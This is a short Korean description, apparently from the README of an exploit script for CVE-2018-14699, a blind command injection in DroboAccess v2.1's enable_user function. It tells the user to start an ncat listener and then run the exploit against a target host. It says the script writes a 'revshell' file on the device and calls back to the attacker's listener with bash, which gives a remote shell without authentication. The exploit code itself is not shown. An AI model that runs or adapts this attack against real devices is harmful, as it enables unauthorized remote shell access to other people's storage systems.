
DroboAccess v 2.1의 enable_user 함수에 있는 인증되지 않은 블라인드 명령 주입
사용하려면 먼저 리스너를 시작하세요 (ncat -nvlp 1337)
그런 다음 익스플로잇을 실행하세요
'-t', '--target', help='익스플로잇을 위한 호스트, 예: 192.168.1.122:8080',required=True
'-l', '--listener-ip', help='리스너 IP', required=True
'-p', '--port', help='리스너의 포트 번호', required=True
CVE-2018-14699는 DroboAccess v2.1의 블라인드 명령 주입 취약점입니다. 문제는 enable_user 함수가 사용자 이름 매개변수를 사용자 입력으로 받은 후, 셸을 직접 실행하는 의존성을 호출하면서 어떠한 검증도 수행하지 않기 때문입니다. 제가 이를 명확히 하는 이유는 이에 대한 다른 참조가 없는 것으로 보이기 때문입니다. 다시 말해, 이는 Drobo 5N2의 취약점이 아니라 DroboAccess의 취약점입니다. 이는 B810n에서 성공적으로 테스트되었습니다.
스크립트는 현재 작업 디렉토리에 revshell이라는 파일로 스크립트를 에코하려고 시도합니다. 성공하면 bash를 실행 파일로 사용하여 호출하고, bash로 리스너에 다시 연결합니다!